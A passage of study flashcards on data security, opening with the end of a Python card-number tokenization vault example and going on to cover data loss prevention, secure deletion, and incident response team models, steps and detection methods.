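    card number, last `keep_last` digits retained, no relation to the original.
    The vault holds the only way back; losing the vault's contents is the whole risk."""

    def __init__(self, keep_last: int = 4):
        self.keep_last = keep_last
        self._to_token = {}      # real value -> token
        self._to_value = {}      # token -> real value

    def tokenize(self, pan: str) -> str:
        if pan in self._to_token:
            return self._to_token[pan]      # deterministic, so records can still be joined on it
        while True:
            body = "".join(str(secrets.randbelow(10)) for _ in range(len(pan) - self.keep_last))
            token = body + pan[-self.keep_last:]
            if token != pan and token not in self._to_value:
                break
        self._to_token[pan] = token
        self._to_value[token] = pan
        return token

    def detokenize(self, token: str) -> str:
        return self._to_value[token]


def mask(pan: str, keep_last: int = 4, symbol: str = "*") -> str:
    """One-way: only the last digits survive."""
    return symbol * (len(pan) - keep_last) + pan[-keep_last:]


if __name__ == "__main__":
    vault = TokenVault()
    token = vault.tokenize("4111111111111111")
    print(token, vault.detokenize(token), mask("4111111111111111"))
```

Keeping the last four digits is common for receipts and support lookups, but it leaves fewer random digits in the token; a vault that also enforces access control and logs every detokenize call is what makes the scheme stronger than encryption for this use.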
69
Data loss prevention ( DLP)
-network-based DLP: scans outgoing data that meets specific criteria (patterns such as card or account numbers, classification labels) in channels such as email, file transfer protocols, and direct messaging, and blocks or quarantines it
-cloud-based DLP: the same inspection applied to data stored in or leaving cloud services
-endpoint-based DLP: controls data leaving a device through a printer, USB drive, or any other channel to which data can be transferred
70
method of protect data
-physical security
-digital security controls: encrypted hard drives, USB drives, and source files
-authorization and user access controls: role-based access controls, rule-based access controls, discretionary access controls, and multifactor authentication
-change management controls
-backup and recovery mechanisms
71
delete confidential information
-purge vs delete (as defined in this material): purged data is removed from the live system but can still be accessed through archives; deleted data has every reference to it permanently removed
-caveat: NIST SP 800-88 uses the words the other way round (purge is the irreversible sanitization level, while an ordinary delete usually leaves the data recoverable), so check which vocabulary a question is using
72
method of delete confidential information
-physical destruction
-erasing (or deleting): a permanent delete operation on a file
-overwriting/clearing: preparing media for reuse by replacing the old data with unclassified data
73
three response team model
-centralized incident response team: a single incident response team manages incidents across the organization (effective for small organizations)
-distributed incident response team: multiple incident response teams; effective for organizations whose computing resources are spread geographically
-coordinating team: a secondary function of either a distributed or a centralized incident response team is coordinating with other departments without having authority over those teams
74
consider factor when selecting structure and staffing model for incident response team
-24/7 availability
-full-time vs part-time team members
-employee morale
-cost
-staff expertise
75
Event vs incident
-event: any observable occurrence in a system or network; it can be normal or abnormal and is not necessarily harmful
-incident: a security event (or series of events) that actually compromises, or threatens to compromise, the confidentiality, integrity, or availability (CIA) of information or systems; something bad happened that requires a response
76
steps in responding to an incident
1. preparation: tools and methods adopted in advance include vulnerability assessment software (vulnerability scanners), intrusion detection and prevention applications, anti-malware software, and training for both end users and specialists
2. detection: recognizing deviations from normal operations, evaluating those deviations, and classifying each as either an acceptable event or a cybersecurity incident
3. containment: keep the incident from spreading: determine the best approach to eliminate the threat, isolate a segment of the network, remove infected servers from production, and inform employees that routine operations might stop
4. eradication: remove the threat and restore the affected systems
5. reporting
6. recovery: the early days focus on overall security and immediate high-impact changes, followed by a long-term phase of strategic changes such as a shift in infrastructure to prevent similar incidents from recurring
7. post-incident activity / lessons learned
(NIST SP 800-61 groups the same work into four phases: preparation; detection and analysis; containment, eradication and recovery; post-incident activity.)
77
Indications an organization did not respond appropriately
-increase in the frequency or severity of incidents
-longer time to identify or contain incidents
-increases in data center downtime or IT infrastructure damage
-costs of fines, attorneys, and consultants
-decline in company reputation
78
method of detection listed in the content of an IRP
-vulnerability scanning software
-anomaly detection
-endpoint detection and response (EDR) solutions
-file integrity monitoring
-log analysis
-intrusion detection system (IDS)
-intrusion prevention system (IPS)
-physical security monitoring
-security information and event management (SIEM) solutions
-threat intelligence software
-user behavior analytics (UBA) tools
79
adverse event vs computer security incident
-adverse event: any event with negative consequences, whether intentional or unintentional, human-caused or environmental; e.g., system crashes, packet floods, unauthorized use of system privileges
-computer security incident: a security-related adverse event caused by malicious human intent; e.g., an attacker flooding a web server with requests until the site crashes